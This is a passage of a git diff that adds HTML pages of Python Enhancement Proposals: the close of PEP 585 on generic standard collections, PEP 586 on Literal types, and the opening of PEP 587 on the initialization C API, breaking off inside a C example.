The deprecated functionality may eventually be removed from the typing +module. Removal will occur no sooner than Python 3.9’s end of life, +scheduled for October 2025.

+
+

Parameters to generics are available at runtime

+

Preserving the generic type at runtime enables introspection of the type +which can be used for API generation or runtime type checking. Such +usage is already present in the wild.

+

Just like with the typing module today, the parameterized generic +types listed in the previous section all preserve their type parameters +at runtime:

+
>>> list[str]
+list[str]
+>>> tuple[int, ...]
+tuple[int, ...]
+>>> ChainMap[str, list[str]]
+collections.ChainMap[str, list[str]]
+
+
+

This is implemented using a thin proxy type that forwards all method +calls and attribute accesses to the bare origin type with the following +exceptions:

+
    +
  • the __repr__ shows the parameterized type;
  • +
  • the __origin__ attribute points at the non-parameterized +generic class;
  • +
  • the __args__ attribute is a tuple (possibly of length +1) of generic types passed to the original __class_getitem__;
  • +
  • the __parameters__ attribute is a lazily computed tuple +(possibly empty) of unique type variables found in __args__;
  • +
  • the __getitem__ raises an exception to disallow mistakes +like dict[str][str]. However it allows e.g. dict[str, T][int] +and in that case returns dict[str, int].
  • +
+
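Most of these attributes can be inspected interactively on Python 3.9:

>>> from typing import TypeVar
>>> T = TypeVar('T')
>>> alias = dict[str, T]
>>> alias.__origin__
<class 'dict'>
>>> alias.__args__
(<class 'str'>, ~T)
>>> alias.__parameters__
(~T,)
>>> alias[int]   # substitutes the remaining type variable
dict[str, int]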

This design means that it is possible to create instances of +parameterized collections, like:

+
>>> l = list[str]()
+>>> l
+[]
+>>> list is list[str]
+False
+>>> list == list[str]
+False
+>>> list[str] == list[str]
+True
+>>> list[str] == list[int]
+False
+>>> isinstance([1, 2, 3], list[str])
+TypeError: isinstance() arg 2 cannot be a parameterized generic
+>>> issubclass(list, list[str])
+TypeError: issubclass() arg 2 cannot be a parameterized generic
+>>> isinstance(list[str], types.GenericAlias)
+True
+
+
+

Objects created with bare types and parameterized types are exactly the +same. The generic parameters are not preserved in instances created +with parameterized types, in other words generic types erase type +parameters during object creation.

+

One important consequence of this is that the interpreter does not +attempt to type check operations on the collection created with +a parameterized type. This provides symmetry between:

+
l: list[str] = []
+
+
+

and:

+
l = list[str]()
+
+
+

For accessing the proxy type from Python code, it will be exported +from the types module as GenericAlias.

+

Pickling or (shallow- or deep-) copying a GenericAlias instance +will preserve the type, origin, attributes and parameters.
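For example, on Python 3.9:

>>> import copy, pickle
>>> alias = dict[str, int]
>>> pickle.loads(pickle.dumps(alias))
dict[str, int]
>>> copy.deepcopy(alias)
dict[str, int]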

+
+
+

Forward compatibility

+

Future standard collections must implement the same behavior.

+
+
+
+

Reference implementation

+

A proof-of-concept or prototype implementation exists.

+
+
+

Rejected alternatives

+
+

Do nothing

+

Keeping the status quo forces Python programmers to perform book-keeping +of imports from the typing module for standard collections, making +all but the simplest annotations cumbersome to maintain. The existence +of parallel types is confusing to newcomers (why is there both list +and List?).

+

The above problems also don’t exist in user-built generic classes which +share runtime functionality and the ability to use them as generic type +annotations. Making standard collections harder to use in type hinting +from user classes hindered typing adoption and usability.

+
+
+

Generics erasure

+

It would be easier to implement __class_getitem__ on the listed +standard collections in a way that doesn’t preserve the generic type, +in other words:

+
>>> list[str]
+<class 'list'>
+>>> tuple[int, ...]
+<class 'tuple'>
+>>> collections.ChainMap[str, list[str]]
+<class 'collections.ChainMap'>
+
+
+

This is problematic as it breaks backwards compatibility: current +equivalents of those types in the typing module do preserve +the generic type:

+
>>> from typing import List, Tuple, ChainMap
+>>> List[str]
+typing.List[str]
+>>> Tuple[int, ...]
+typing.Tuple[int, ...]
+>>> ChainMap[str, List[str]]
+typing.ChainMap[str, typing.List[str]]
+
+
+

As mentioned in the “Implementation” section, preserving the generic +type at runtime enables runtime introspection of the type which can be +used for API generation or runtime type checking. Such usage is already +present in the wild.

+

Additionally, implementing subscripts as identity functions would make +Python less friendly to beginners. Say, if a user is mistakenly passing +a list type instead of a list object to a function, and that function is +indexing the received object, the code would no longer raise an error.

+

Today:

+
>>> l = list
+>>> l[-1]
+TypeError: 'type' object is not subscriptable
+
+
+

With __class_getitem__ as an identity function:

+
>>> l = list
+>>> l[-1]
+list
+
+
+

The indexing being successful here would likely end up raising an +exception at a distance, confusing the user.

+
+
+

Disallowing instantiation of parameterized types

+

Given that the proxy type which preserves __origin__ and +__args__ is mostly useful for runtime introspection purposes, +we might have disallowed instantiation of parameterized types.

+

In fact, forbidding instantiation of parameterized types is what the +typing module does today for types which parallel builtin +collections (instantiation of other parameterized types is allowed).

+

The original reason for this decision was to discourage spurious +parameterization which made object creation up to two orders of magnitude +slower compared to the special syntax available for those builtin +collections.

+

This rationale is not strong enough to allow the exceptional treatment +of builtins. All other parameterized types can be instantiated, +including parallels of collections in the standard library. Moreover, +Python allows for instantiation of lists using list() and some +builtin collections don’t provide special syntax for instantiation.

+
+
+

Making isinstance(obj, list[str]) perform a check ignoring generics

+

An earlier version of this PEP suggested treating parameterized generics +like list[str] as equivalent to their non-parameterized variants +like list for purposes of isinstance() and issubclass(). +This would be symmetrical to how list[str]() creates a regular list.

+

This design was rejected because isinstance() and issubclass() +checks with parameterized generics would read like element-by-element +runtime type checks. The result of those checks would be surprising, +for example:

+
>>> isinstance([1, 2, 3], list[str])
+True
+
+
+

Note the object doesn’t match the provided generic type but +isinstance() still returns True because it only checks whether +the object is a list.

+

If a library is faced with a parameterized generic and would like to +perform an isinstance() check using the base type, that type can +be retrieved using the __origin__ attribute on the parameterized +generic.
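For example:

>>> isinstance([1, 2, 3], list[str].__origin__)
True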

+
+
+

Making isinstance(obj, list[str]) perform a runtime type check

+

This functionality requires iterating over the collection, which is a destructive operation for some of them (iterators, for example). This functionality would have been useful; however, implementing within Python a type checker that would deal with complex types, nested type checking, type variables, string forward references, and so on is out of scope for this PEP.
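To see why iteration can be destructive, consider an iterator: any element-by-element check would consume values the real consumer expected to receive:

>>> items = iter([1, 2, 3])
>>> next(items)   # a hypothetical element-wise check would have to do this
1
>>> list(items)   # the checked element is now lost
[2, 3]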

+
+
+

Naming the type GenericType instead of GenericAlias

+

We considered a different name for this type, but decided +GenericAlias is better – these aren’t real types, they are +aliases for the corresponding container type with some extra metadata +attached.

+
+
+
+

Note on the initial draft

+

An early version of this PEP discussed matters beyond generics in +standard collections. Those unrelated topics were removed for clarity.

+
+
+

Acknowledgments

+

Thank you to Guido van Rossum for his work on Python, and the +implementation of this PEP specifically.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0585.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0586/index.html b/pep-0586/index.html new file mode 100644 index 00000000000..23359ef769b --- /dev/null +++ b/pep-0586/index.html @@ -0,0 +1,875 @@ + PEP 586 – Literal Types | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 586 – Literal Types

+
+
Author:
+
Michael Lee <michael.lee.0x2a at gmail.com>, Ivan Levkivskyi <levkivskyi at gmail.com>, Jukka Lehtosalo <jukka.lehtosalo at iki.fi>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
14-Mar-2019
+
Python-Version:
+
3.8
+
Post-History:
+
14-Mar-2019
+
Resolution:
+
Typing-SIG message
+
+
+
+
Table of Contents +
+
+

Attention

+

This PEP is a historical document: see Literals and +typing.Literal for up-to-date specs and documentation. Canonical typing specs are maintained at the typing specs site; runtime typing behaviour is described in the CPython documentation.

+


+

See the typing specification update process for how to propose changes to the typing spec.

+
+
+

Abstract

+

This PEP proposes adding Literal types to the PEP 484 ecosystem. +Literal types indicate that some expression has literally a +specific value. For example, the following function will accept +only expressions that have literally the value “4”:

+
from typing import Literal
+
+def accepts_only_four(x: Literal[4]) -> None:
+    pass
+
+accepts_only_four(4)   # OK
+accepts_only_four(19)  # Rejected
+
+
+
+
+

Motivation and Rationale

+

Python has many APIs that return different types depending on the +value of some argument provided. For example:

+
    +
  • open(filename, mode) returns either IO[bytes] or IO[Text] +depending on whether the second argument is something like r or +rb.
  • +
  • subprocess.check_output(...) returns either bytes or text +depending on whether the universal_newlines keyword argument is +set to True or not.
  • +
+

This pattern is also fairly common in many popular 3rd party libraries. +For example, here are just two examples from pandas and numpy respectively:

+
    +
  • pandas.concat(...) will return either Series or +DataFrame depending on whether the axis argument is set to +0 or 1.
  • +
  • numpy.unique will return either a single array or a tuple containing +anywhere from two to four arrays depending on three boolean flag values.
  • +
+

The typing issue tracker contains some +additional examples and discussion.

+

There is currently no way of expressing the type signatures of these +functions: PEP 484 does not include any mechanism for writing signatures +where the return type varies depending on the value passed in. +Note that this problem persists even if we redesign these APIs to +instead accept enums: MyEnum.FOO and MyEnum.BAR are both +considered to be of type MyEnum.

+

Currently, type checkers work around this limitation by adding ad hoc +extensions for important builtins and standard library functions. For +example, mypy comes bundled with a plugin that attempts to infer more +precise types for open(...). While this approach works for standard +library functions, it’s unsustainable in general: it’s not reasonable to +expect 3rd party library authors to maintain plugins for N different +type checkers.

+

We propose adding Literal types to address these gaps.

+
+
+

Core Semantics

+

This section outlines the baseline behavior of literal types.

+
+

Core behavior

+

Literal types indicate that a variable has a specific and +concrete value. For example, if we define some variable foo to have +type Literal[3], we are declaring that foo must be exactly equal +to 3 and no other value.

+

Given some value v that is a member of type T, the type +Literal[v] shall be treated as a subtype of T. For example, +Literal[3] is a subtype of int.

+

All methods from the parent type will be directly inherited by the +literal type. So, if we have some variable foo of type Literal[3] +it’s safe to do things like foo + 5 since foo inherits int’s +__add__ method. The resulting type of foo + 5 is int.

+

This “inheriting” behavior is identical to how we +handle NewTypes.
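In the reveal_type convention used elsewhere in this PEP, that inference looks like:

from typing import Literal

foo: Literal[3] = 3
reveal_type(foo + 5)   # Revealed type is 'int'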

+
+
+

Equivalence of two Literals

+

Two types Literal[v1] and Literal[v2] are equivalent when +both of the following conditions are true:

+
    +
  1. type(v1) == type(v2)
  2. +
  3. v1 == v2
  4. +
+

For example, Literal[20] and Literal[0x14] are equivalent. However, Literal[0] and Literal[False] are not equivalent, despite the fact that 0 == False evaluates to true at runtime: 0 has type int and False has type bool.
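Hypothetically, a type checker applying these two rules would judge annotated assignments like the following (the variable names are illustrative):

from typing import Literal

x: Literal[20] = 0x14   # OK: type(20) == type(0x14) and 20 == 0x14
y: Literal[0] = False   # Error: False has type bool, not int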

+
+
+

Shortening unions of literals

+

Literals are parameterized with one or more values. When a Literal is +parameterized with more than one value, it’s treated as exactly equivalent +to the union of those types. That is, Literal[v1, v2, v3] is equivalent +to Union[Literal[v1], Literal[v2], Literal[v3]].

+

This shortcut helps make writing signatures for functions that accept +many different literals more ergonomic — for example, functions like +open(...):

+
# Note: this is a simplification of the true type signature.
+_PathType = Union[str, bytes, int]
+
+@overload
+def open(path: _PathType,
+         mode: Literal["r", "w", "a", "x", "r+", "w+", "a+", "x+"],
+         ) -> IO[Text]: ...
+@overload
+def open(path: _PathType,
+         mode: Literal["rb", "wb", "ab", "xb", "r+b", "w+b", "a+b", "x+b"],
+         ) -> IO[bytes]: ...
+
+# Fallback overload for when the user isn't using literal types
+@overload
+def open(path: _PathType, mode: str) -> IO[Any]: ...
+
+
+

The provided values do not all have to be members of the same type. +For example, Literal[42, "foo", True] is a legal type.

+

However, Literal must be parameterized with at least one type. +Types like Literal[] or Literal are illegal.

+
+
+ +
+

Type inference

+

This section describes a few rules regarding type inference and +literals, along with some examples.

+
+

Backwards compatibility

+

When type checkers add support for Literal, it’s important they do so +in a way that maximizes backwards-compatibility. Type checkers should +ensure that code that used to type check continues to do so after support +for Literal is added on a best-effort basis.

+

This is particularly important when performing type inference. For +example, given the statement x = "blue", should the inferred +type of x be str or Literal["blue"]?

+

One naive strategy would be to always assume expressions are intended +to be Literal types. So, x would always have an inferred type of +Literal["blue"] in the example above. This naive strategy is almost +certainly too disruptive – it would cause programs like the following +to start failing when they previously did not:

+
# If a type checker infers 'var' has type Literal[3]
+# and my_list has type List[Literal[3]]...
+var = 3
+my_list = [var]
+
+# ...this call would be a type-error.
+my_list.append(4)
+
+
+

Another example of when this strategy would fail is when setting fields +in objects:

+
class MyObject:
+    def __init__(self) -> None:
+        # If a type checker infers MyObject.field has type Literal[3]...
+        self.field = 3
+
+m = MyObject()
+
+# ...this assignment would no longer type check
+m.field = 4
+
+
+

An alternative strategy that does maintain compatibility in every case would +be to always assume expressions are not Literal types unless they are +explicitly annotated otherwise. A type checker using this strategy would +always infer that x is of type str in the first example above.

+

This is not the only viable strategy: type checkers should feel free to experiment +with more sophisticated inference techniques. This PEP does not mandate any +particular strategy; it only emphasizes the importance of backwards compatibility.

+
+
+

Using non-Literals in Literal contexts

+

Literal types follow the existing rules regarding subtyping with no additional +special-casing. For example, programs like the following are type safe:

+
def expects_str(x: str) -> None: ...
+var: Literal["foo"] = "foo"
+
+# Legal: Literal["foo"] is a subtype of str
+expects_str(var)
+
+
+

This also means non-Literal expressions in general should not automatically +be cast to Literal. For example:

+
def expects_literal(x: Literal["foo"]) -> None: ...
+
+def runner(my_str: str) -> None:
+    # ILLEGAL: str is not a subclass of Literal["foo"]
+    expects_literal(my_str)
+
+
+

Note: If the user wants their API to support accepting both literals +and the original type – perhaps for legacy purposes – they should +implement a fallback overload. See Interactions with overloads.

+
+
+
+

Interactions with other types and features

+

This section discusses how Literal types interact with other existing types.

+
+

Intelligent indexing of structured data

+

Literals can be used to “intelligently index” into structured types like +tuples, NamedTuple, and classes. (Note: this is not an exhaustive list).

+

For example, type checkers should infer the correct value type when indexing into a tuple using an int key that corresponds to a valid index:

+
a: Literal[0] = 0
+b: Literal[5] = 5
+
+some_tuple: Tuple[int, str, List[bool]] = (3, "abc", [True, False])
+reveal_type(some_tuple[a])   # Revealed type is 'int'
+some_tuple[b]                # Error: 5 is not a valid index into the tuple
+
+
+

We expect similar behavior when using functions like getattr:

+
class Test:
+    def __init__(self, param: int) -> None:
+        self.myfield = param
+
+    def mymethod(self, val: int) -> str: ...
+
+a: Literal["myfield"]  = "myfield"
+b: Literal["mymethod"] = "mymethod"
+c: Literal["blah"]     = "blah"
+
+t = Test(0)  # Test.__init__ requires an int argument
+reveal_type(getattr(t, a))  # Revealed type is 'int'
+reveal_type(getattr(t, b))  # Revealed type is 'Callable[[int], str]'
+getattr(t, c)               # Error: No attribute named 'blah' in Test
+
+
+

Note: See Interactions with Final for a proposal on how we can +express the variable declarations above in a more compact manner.

+
+
+

Interactions with overloads

+

Literal types and overloads do not need to interact in a special +way: the existing rules work fine.

+

However, one important use case type checkers must take care to +support is the ability to use a fallback when the user is not using literal +types. For example, consider open:

+
_PathType = Union[str, bytes, int]
+
+@overload
+def open(path: _PathType,
+         mode: Literal["r", "w", "a", "x", "r+", "w+", "a+", "x+"],
+         ) -> IO[Text]: ...
+@overload
+def open(path: _PathType,
+         mode: Literal["rb", "wb", "ab", "xb", "r+b", "w+b", "a+b", "x+b"],
+         ) -> IO[bytes]: ...
+
+# Fallback overload for when the user isn't using literal types
+@overload
+def open(path: _PathType, mode: str) -> IO[Any]: ...
+
+
+

If we were to change the signature of open to use just the first two overloads, +we would break any code that does not pass in a literal string expression. +For example, code like this would be broken:

+
mode: str = pick_file_mode(...)
+with open(path, mode) as f:
+    # f should continue to be of type IO[Any] here
+
+
+

A little more broadly: we propose adding a policy to typeshed that +mandates that whenever we add literal types to some existing API, we also +always include a fallback overload to maintain backwards-compatibility.

+
+
+

Interactions with generics

+

Types like Literal[3] are meant to be just plain old subclasses of +int. This means you can use types like Literal[3] anywhere +you could use normal types, such as with generics.

+

This means that it is legal to parameterize generic functions or +classes using Literal types:

+
A = TypeVar('A', bound=int)
+B = TypeVar('B', bound=int)
+C = TypeVar('C', bound=int)
+
+# A simplified definition for Matrix[row, column]
+class Matrix(Generic[A, B]):
+    def __add__(self, other: Matrix[A, B]) -> Matrix[A, B]: ...
+    def __matmul__(self, other: Matrix[B, C]) -> Matrix[A, C]: ...
+    def transpose(self) -> Matrix[B, A]: ...
+
+foo: Matrix[Literal[2], Literal[3]] = Matrix(...)
+bar: Matrix[Literal[3], Literal[7]] = Matrix(...)
+
+baz = foo @ bar
+reveal_type(baz)  # Revealed type is 'Matrix[Literal[2], Literal[7]]'
+
+
+

Similarly, it is legal to construct TypeVars with value restrictions +or bounds involving Literal types:

+
T = TypeVar('T', Literal["a"], Literal["b"], Literal["c"])
+S = TypeVar('S', bound=Literal["foo"])
+
+
+

…although it is unclear when it would ever be useful to construct a +TypeVar with a Literal upper bound. For example, the S TypeVar in +the above example is essentially pointless: we can get equivalent behavior +by using S = Literal["foo"] instead.

+

Note: Literal types and generics deliberately interact in only very basic and limited ways. In particular, libraries that want to type check code containing a heavy amount of numeric or numpy-style manipulation will almost certainly find Literal types as proposed in this PEP to be insufficient for their needs.

+

We considered several different proposals for fixing this, but ultimately +decided to defer the problem of integer generics to a later date. See +Rejected or out-of-scope ideas for more details.

+
+
+

Interactions with enums and exhaustiveness checks

+

Type checkers should be capable of performing exhaustiveness checks when working with Literal types that have a closed number of variants, such as enums. For example, the type checker should be capable of inferring that the final else branch must be of type str, since all three values of the Status enum have already been exhausted:

+
class Status(Enum):
+    SUCCESS = 0
+    INVALID_DATA = 1
+    FATAL_ERROR = 2
+
+def parse_status(s: Union[str, Status]) -> None:
+    if s is Status.SUCCESS:
+        print("Success!")
+    elif s is Status.INVALID_DATA:
+        print("The given data is invalid because...")
+    elif s is Status.FATAL_ERROR:
+        print("Unexpected fatal error...")
+    else:
+        # 's' must be of type 'str' since all other options are exhausted
+        print("Got custom status: " + s)
+
+
+

The interaction described above is not new: it’s already +codified within PEP 484. +However, many type +checkers (such as mypy) do not yet implement this due to the expected +complexity of the implementation work.

+

Some of this complexity will be alleviated once Literal types are introduced: +rather than entirely special-casing enums, we can instead treat them as being +approximately equivalent to the union of their values and take advantage of any +existing logic regarding unions, exhaustibility, type narrowing, reachability, +and so forth the type checker might have already implemented.

+

So here, the Status enum could be treated as being approximately equivalent +to Literal[Status.SUCCESS, Status.INVALID_DATA, Status.FATAL_ERROR] +and the type of s narrowed accordingly.

+
+
+

Interactions with narrowing

+

Type checkers may optionally perform additional analysis for both enum and +non-enum Literal types beyond what is described in the section above.

+

For example, it may be useful to perform narrowing based on things like +containment or equality checks:

+
def parse_status(status: str) -> None:
+    if status in ("MALFORMED", "ABORTED"):
+        # Type checker could narrow 'status' to type
+        # Literal["MALFORMED", "ABORTED"] here.
+        return expects_bad_status(status)
+
+    # Similarly, type checker could narrow 'status' to Literal["PENDING"]
+    if status == "PENDING":
+        expects_pending_status(status)
+
+
+

It may also be useful to perform narrowing taking into account expressions +involving Literal bools. For example, we can combine Literal[True], +Literal[False], and overloads to construct “custom type guards”:

+
@overload
+def is_int_like(x: Union[int, List[int]]) -> Literal[True]: ...
+@overload
+def is_int_like(x: object) -> bool: ...
+def is_int_like(x): ...
+
+vector: List[int] = [1, 2, 3]
+if is_int_like(vector):
+    vector.append(3)
+else:
+    vector.append("bad")   # This branch is inferred to be unreachable
+
+scalar: Union[int, str]
+if is_int_like(scalar):
+    scalar += 3      # Type checks: type of 'scalar' is narrowed to 'int'
+else:
+    scalar += "foo"  # Type checks: type of 'scalar' is narrowed to 'str'
+
+
+
+
+

Interactions with Final

+

PEP 591 proposes adding a “Final” qualifier to the typing +ecosystem. This qualifier can be used to declare that some variable or +attribute cannot be reassigned:

+
foo: Final = 3
+foo = 4           # Error: 'foo' is declared to be Final
+
+
+

Note that in the example above, we know that foo will always be equal to +exactly 3. A type checker can use this information to deduce that foo +is valid to use in any context that expects a Literal[3]:

+
def expects_three(x: Literal[3]) -> None: ...
+
+expects_three(foo)  # Type checks, since 'foo' is Final and equal to 3
+
+
+

The Final qualifier serves as a shorthand for declaring that a variable +is effectively Literal.

+

If both this PEP and PEP 591 are accepted, type checkers are expected to +support this shortcut. Specifically, given a variable or attribute assignment +of the form var: Final = value where value is a valid parameter for +Literal[...], type checkers should understand that var may be used in +any context that expects a Literal[value].

+

Type checkers are not obligated to understand any other uses of Final. For +example, whether or not the following program type checks is left unspecified:

+
# Note: The assignment does not exactly match the form 'var: Final = value'.
+bar1: Final[int] = 3
+expects_three(bar1)  # May or may not be accepted by type checkers
+
+# Note: "Literal[1 + 2]" is not a legal type.
+bar2: Final = 1 + 2
+expects_three(bar2)  # May or may not be accepted by type checkers
+
+
+
+
+
+

Rejected or out-of-scope ideas

+

This section outlines some potential features that are explicitly out-of-scope.

+
+

True dependent types/integer generics

+

This proposal is essentially describing adding a very simplified +dependent type system to the PEP 484 ecosystem. One obvious extension +would be to implement a full-fledged dependent type system that lets users +predicate types based on their values in arbitrary ways. That would +let us write signatures like the below:

+
# A vector has length 'n', containing elements of type 'T'
+class Vector(Generic[N, T]): ...
+
+# The type checker will statically verify our function genuinely does
+# construct a vector that is equal in length to "len(vec1) + len(vec2)"
+# and will throw an error if it does not.
+def concat(vec1: Vector[A, T], vec2: Vector[B, T]) -> Vector[A + B, T]:
+    # ...snip...
+
+
+

At the very least, it would be useful to add some form of integer generics.

+

Although such a type system would certainly be useful, it’s out of scope +for this PEP: it would require a far more substantial amount of implementation +work, discussion, and research to complete compared to the current proposal.

+

It’s entirely possible we’ll circle back and revisit this topic in the future: +we very likely will need some form of dependent typing along with other +extensions like variadic generics to support popular libraries like numpy.

+

This PEP should be seen as a stepping stone towards this goal, +rather than an attempt at providing a comprehensive solution.

+
+
+

Adding more concise syntax

+

One objection to this PEP is that having to explicitly write Literal[...] +feels verbose. For example, instead of writing:

+
def foobar(arg1: Literal[1], arg2: Literal[True]) -> None:
+    pass
+
+
+

…it would be nice to instead write:

+
def foobar(arg1: 1, arg2: True) -> None:
+    pass
+
+
+

Unfortunately, these abbreviations simply will not work with the +existing implementation of typing at runtime. For example, the +following snippet crashes when run using Python 3.7:

+
from typing import Tuple
+
+# Supposed to accept tuple containing the literals 1 and 2
+def foo(x: Tuple[1, 2]) -> None:
+    pass
+
+
+

Running this yields the following exception:

+
TypeError: Tuple[t0, t1, ...]: each t must be a type. Got 1.
+
+
+

We don’t want users to have to memorize exactly when it’s ok to elide +Literal, so we require Literal to always be present.

+

A little more broadly, we feel overhauling the syntax of types in +Python is not within the scope of this PEP: it would be best to have +that discussion in a separate PEP, instead of attaching it to this one. +So, this PEP deliberately does not try and innovate Python’s type syntax.

+
+
+
+

Backporting the Literal type

+

Once this PEP is accepted, the Literal type will need to be backported for +Python versions that come bundled with older versions of the typing module. +We plan to do this by adding Literal to the typing_extensions 3rd party +module, which contains a variety of other backported types.

+
+
+

Implementation

+

The mypy type checker currently has implemented a large subset of the behavior +described in this spec, with the exception of enum Literals and some of the +more complex narrowing interactions described above.

+
+ +
+

Acknowledgements

+

Thanks to Mark Mendoza, Ran Benita, Rebecca Chen, and the other members of +typing-sig for their comments on this PEP.

+

Additional thanks to the various participants in the mypy and typing issue +trackers, who helped provide a lot of the motivation and reasoning behind +this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0586.rst

+

Last modified: 2024-06-11 22:12:09 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0587/index.html b/pep-0587/index.html new file mode 100644 index 00000000000..d8d295cd774 --- /dev/null +++ b/pep-0587/index.html @@ -0,0 +1,1881 @@ + PEP 587 – Python Initialization Configuration | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 587 – Python Initialization Configuration

+
+
Author:
+
Victor Stinner <vstinner at python.org>, Alyssa Coghlan <ncoghlan at gmail.com>
+
BDFL-Delegate:
+
Thomas Wouters <thomas at python.org>
+
Discussions-To:
+
Python-Dev list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
27-Mar-2019
+
Python-Version:
+
3.8
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add a new C API to configure the Python Initialization providing finer +control on the whole configuration and better error reporting.

+

It becomes possible to read the configuration and then override some +computed parameters before it is applied. It also becomes possible to +completely override how Python computes the module search paths +(sys.path).

+

The new Isolated Configuration provides sane default values to isolate Python from the system, for example when embedding Python into an application. Using the environment is now an opt-in option rather than an opt-out one: environment variables, command line arguments and global configuration variables are ignored by default.

+

Building a customized Python which behaves like the regular Python becomes easier using the new Py_RunMain() function. Moreover, using the Python Configuration, PyConfig.argv arguments are now parsed the same way the regular Python parses command line arguments, and PyConfig.xoptions are handled as -X opt command line options.

+

This extracts a subset of the API design from the PEP 432 development +and refactoring work that is now considered sufficiently stable to make +public (allowing 3rd party embedding applications access to the same +configuration APIs that the native CPython CLI is now using).

+
+
+

Rationale

+

Python is highly configurable but its configuration evolved organically. +The initialization configuration is scattered all around the code using +different ways to set them: global configuration variables (ex: +Py_IsolatedFlag), environment variables (ex: PYTHONPATH), +command line arguments (ex: -b), configuration files (ex: +pyvenv.cfg), function calls (ex: Py_SetProgramName()). A +straightforward and reliable way to configure Python is needed.

+

Some configuration parameters are not accessible from the C API, or not easily accessible. For example, there is no API to override the default value of sys.executable.

+

Some options like PYTHONPATH can only be set using an environment +variable which has a side effect on Python child processes if not unset +properly.

+

Some options also depend on other options: see Priority and Rules. The Python 3.7 API does not provide a consistent view of the overall configuration.

+

The C API of the Python 3.7 initialization takes wchar_t* strings as input, whereas the Python filesystem encoding is only set during initialization, which can lead to mojibake.

+

Python 3.7 APIs like Py_Initialize() abort the process on memory allocation failure, which is not convenient when Python is embedded. Moreover, Py_Main() could exit the process directly rather than returning an exit code. The proposed new API reports the error or exit code to the caller, which can decide how to handle it.

+

Implementing PEP 540 (UTF-8 Mode) and the new -X dev option correctly was almost impossible in Python 3.6. The code base has been deeply reworked in Python 3.7 and then in Python 3.8 to read the configuration into a structure with no side effects. It becomes possible to clear the configuration (release memory) and read the configuration again if the encoding changed. This is required to properly implement the UTF-8 Mode, which changes the encoding using the -X utf8 command line option. Internally, bytes argv strings are decoded from the filesystem encoding. The -X dev option changes the memory allocator (behaving as PYTHONMALLOC=debug), whereas previously it was not possible to change the memory allocator while parsing the command line arguments. The new design of the internal implementation not only allowed -X utf8 and -X dev to be implemented properly, it also makes it much easier to change Python's behavior, especially for corner cases like these, and ensures that the configuration remains consistent: see Priority and Rules.

+

This PEP is a partial implementation of PEP 432, which is the overall design. New fields can be added later to the PyConfig structure to finish the implementation of PEP 432 (e.g. by adding a new partial initialization API which allows configuring Python using Python objects to finish the full initialization). However, those features are omitted from this PEP as even the native CPython CLI doesn't work that way; the public API proposal in this PEP is limited to features which have already been implemented and adopted as private APIs for use in the native CPython CLI.

+
+
+

Python Initialization C API

+

This PEP proposes to add the following new structures and functions.

+

New structures:

+
    +
  • PyConfig
  • +
  • PyPreConfig
  • +
  • PyStatus
  • +
  • PyWideStringList
  • +
+

New functions:

+
    +
  • PyConfig_Clear(config)
  • +
  • PyConfig_InitIsolatedConfig()
  • +
  • PyConfig_InitPythonConfig()
  • +
  • PyConfig_Read(config)
  • +
  • PyConfig_SetArgv(config, argc, argv)
  • +
  • PyConfig_SetBytesArgv(config, argc, argv)
  • +
  • PyConfig_SetBytesString(config, config_str, str)
  • +
  • PyConfig_SetString(config, config_str, str)
  • +
  • PyPreConfig_InitIsolatedConfig(preconfig)
  • +
  • PyPreConfig_InitPythonConfig(preconfig)
  • +
  • PyStatus_Error(err_msg)
  • +
  • PyStatus_Exception(status)
  • +
  • PyStatus_Exit(exitcode)
  • +
  • PyStatus_IsError(status)
  • +
  • PyStatus_IsExit(status)
  • +
  • PyStatus_NoMemory()
  • +
  • PyStatus_Ok()
  • +
  • PyWideStringList_Append(list, item)
  • +
  • PyWideStringList_Insert(list, index, item)
  • +
  • Py_BytesMain(argc, argv)
  • +
  • Py_ExitStatusException(status)
  • +
  • Py_InitializeFromConfig(config)
  • +
  • Py_PreInitialize(preconfig)
  • +
  • Py_PreInitializeFromArgs(preconfig, argc, argv)
  • +
  • Py_PreInitializeFromBytesArgs(preconfig, argc, argv)
  • +
  • Py_RunMain()
  • +
+

This PEP also adds _PyRuntimeState.preconfig (PyPreConfig type) +and PyInterpreterState.config (PyConfig type) fields to these +internal structures. PyInterpreterState.config becomes the new +reference configuration, replacing global configuration variables and +other private variables.

+
+

PyWideStringList

+

PyWideStringList is a list of wchar_t* strings.

+

PyWideStringList structure fields:

+
    +
  • length (Py_ssize_t)
  • +
  • items (wchar_t**)
  • +
+

Methods:

+
    +
  • PyStatus PyWideStringList_Append(PyWideStringList *list, const wchar_t *item): +Append item to list.
  • +
  • PyStatus PyWideStringList_Insert(PyWideStringList *list, Py_ssize_t index, const wchar_t *item): +Insert item into list at index. If index is greater than +list length, just append item to list.
  • +
+

If length is non-zero, items must be non-NULL and all strings must +be non-NULL.
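For illustration, here is a minimal sketch (the paths are hypothetical) filling the module_search_paths list of a PyConfig. These functions allocate memory, so they must not be called before Python preinitialization:

PyStatus status;

/* Sketch: 'config' is assumed to be a PyConfig initialized
   with PyConfig_InitPythonConfig(). */
status = PyWideStringList_Append(&config.module_search_paths,
                                 L"/opt/app/modules");
if (PyStatus_Exception(status)) {
    Py_ExitStatusException(status);
}

/* Give an override directory the highest priority. */
status = PyWideStringList_Insert(&config.module_search_paths,
                                 0, L"/opt/app/overrides");
if (PyStatus_Exception(status)) {
    Py_ExitStatusException(status);
}

/* Tell Python that sys.path is fully specified. */
config.module_search_paths_set = 1;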

+
+
+

PyStatus

+

PyStatus is a structure to store the status of an initialization +function: success, error or exit. For an error, it can store the C +function name which created the error.

+

Example:

+
PyStatus alloc(void **ptr, size_t size)
+{
+    *ptr = PyMem_RawMalloc(size);
+    if (*ptr == NULL) {
+        return PyStatus_NoMemory();
+    }
+    return PyStatus_Ok();
+}
+
+int main(int argc, char **argv)
+{
+    void *ptr;
+    PyStatus status = alloc(&ptr, 16);
+    if (PyStatus_Exception(status)) {
+        Py_ExitStatusException(status);
